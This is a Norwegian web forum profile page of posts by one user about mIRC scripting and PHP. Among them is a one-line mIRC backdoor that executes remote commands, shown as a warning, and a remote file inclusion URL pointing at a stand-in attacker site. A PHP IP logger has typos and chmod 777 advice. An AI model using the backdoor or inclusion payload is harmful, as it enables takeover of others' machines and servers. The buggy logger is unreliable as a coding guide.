Gå til innhold

Sugx

Medlemmer
  • Innlegg

    131
  • Ble med

  • Besøkte siden sist

Innlegg skrevet av Sugx

  1. Tenkte jeg skulle kikke litt på scripting i dag, så jeg prata litt med en kamerat som har scripta for mIRC ganske lenge. Han viste meg hvordan man ved hjelp av enkel linje med kode kunne lage noe som gjorde at en fikk fullstendig kontroll over en annen pc.

    Vet ikke hvordan det er med dere, men jeg skal aldri loade ett script jeg ikke har kikka igjennom 2 ganger lenger.

    kunnskap er en lett byrde samme hvordan en vrir og vender på det. Ser dere noe som ligner dette i noen script er det fare på ferde.

     

    on ^*:text:haxx *:?: { { $$2- } | haltdef | halt } 

     

    haxx er ett hvilketsomhelst ord som en tulling har bestemt.[/code]

  2. Nei, detta går nok ikke.

    Samme hvordan en vrir og vender på det blir nok en hel verden litt for drøyt jeg tror en skulle hatt mer enn nok jobb foran seg om man bare tok for seg en "simpel" ting som en blomst.

    For siden "alt" i naturen henger sammen så trur jeg nok det måtte buggtestes og finjusteres i 100 år minst etterpå for og tilpasse det hele....

    Synes denne tråden forsåvidt er interessant, men jo mer en tenker på det jo mer uvirkelig blir tanken.

  3. det er jo selvfølgelig det smarteste men hvis man ikke har shell tilgang til serveren går dette som regel ikke an.

     

    joda, en har som regel ftp tilgang i alle fall ett nivå høyere, hvis ikke du kjører gratis greier da, der har du som regel bare ett sted å slenge filene.

    Men samme hva så kaller du aldri filer du inkluderer for .ink eller noe som ikke blir parset av serveren. personlig synes jeg .inc.php fungerer greit ;)

  4. Skjønner ikke at folk klarer seg uten syntax highlighting når de programmerer. For meg er det et must. Det gjør debugging så mye lettere!

     

    Så sant, men det går. Det jeg derimot ikke skjønner er folk som bruker notepad. Det er mildt sagt ett helvete å ikke ha automatisk innrykk etter { har skrevet litt php/java/c++ i notepad(når jeg ikke hadde annet), all tabbinga tok knekken på meg :D

     

    Selv bruker jeg EditPlus, det er kjekt for det klarer å vise filer laget med f.eks vi riktig. Har en gammel versjon, sjekke for updates nå.... :yes:

  5. dette er forholdsvis lett å få til, du lager bare en login side, så sjekker du brukernavn passord opp mot en database/whatever.

    Hvis brukern tastet rektig brukernavn/passord så setter du noen sessions variabler, f.eks $is_logged_in ;) eller cookies.

    Så på de sidene hvor du skal ha hemmelig info så sjekker du bare om session variablen $_SESSION['is_logged_in'] == true

     

    så funker det bra ellernoe jess.

  6. noe jeg lagde for lenge siden, kanskje ikke best, men det funker!

     

    
    <?php
    
    //skrivedelen
    
    $ip = $_SERVER['REMOTE_ADDR'];
    
    $fil = "logg.txt";
    
    $line_id = -1;
    
    
    
    //array delen
    
    $line = @file($fil);
    
    $max = @array_values($line);
    
    $num_lines = count($max);
    
    echo($num_lines);
    
    
    
    //looper oss mellom linjene
    
    for($i=0; $i <= $num_lines; $i++)
    
    {
    
    if("$ipn" == $line[$line_id++])
    
    {
    
     
    
     $skriv="JA"; //hvis $ip allerede finnes i fila...
    
     
    
    }
    
    }
    
    
    
    //Skrive-til-fila-delen
    
    if($skriv!="JA")
    
    {
    
    
    
    $fd = @fopen($fil, "a") or die;//("Kunne ikke åpne filen");
    
    if($fd)
    
    {
    
     fwrite($fd, "$ipn");
    
     fclose($fd);
    
     //echo("Har skrevet til filan<br>");
    
    }
    
    else
    
    {
    
    fclose($fd);
    
    //echo("Ingen skriving er gjort");
    
    }
    
    }
    
    ?>

    [edit]Du må chmodde "logg.txt" eller hva du må kaller fila til 777, men det visste du sikkert :p

  7. Christt har rett, man kan lagre bildet rett inn i databasen.

     

    Det er helt sant at han har rett, men om det er lurt er en annen sak. Jeg lagde en gang noe sånt som dette, problemet var at enkelte browsere hadde problemer med å skjønne at enkelte bilder var bilder, så det innimellom de fine bildene mine kom det binærkoder. Har sett samme problemet andre steder også.

     

    Det greieste, letteste og kjappeste er å bare ha filnavnet/urlen i databasen.

  8. Løsningnen på det første spørsmålet ditt må vel bli sånn ca

    if(!isSet($Name))
    
    {
    
    include("index.php");
    
    }
    
    

     

    Men du bør bruke Lumted/Scalpel sin metode for hvis du ikke på forhånd har definert hvilke sider som skal inkluderes men henter navnet rett fra variablen kan jeg gjørra noe sånt index.php?name=http://www.minondehaxxorside.com/kodesomherpersidadi.php

     

    Hvis du skal unvike dette problemet med din kode så må du nok kjøre noen regexps på inputten for å sjekke at det er riktig.

  9. hehe lite og finne på om dagen eller lumted ;)

     

    Vil bare påpeke en liten ting. Alltid gi filene du skal inkludere navn .php til slutt.

    La oss si at du har en link som ser sånn ut index.php?side=nyheter og i fila nyheter.inc har du noe sånt som mysql_connect(host, bruker, passord); så kan hvem som helst som vil surfe til www.dinurl.com/nyheter.inc og få opp passordet og all kode i klartekst.

     

    Derfor filer du skal inkludere kan du med fordel alltid kalle for f.eks inc.nyhteter.php, nyheter.inc.php eller noe sånt.

×
×
  • Opprett ny...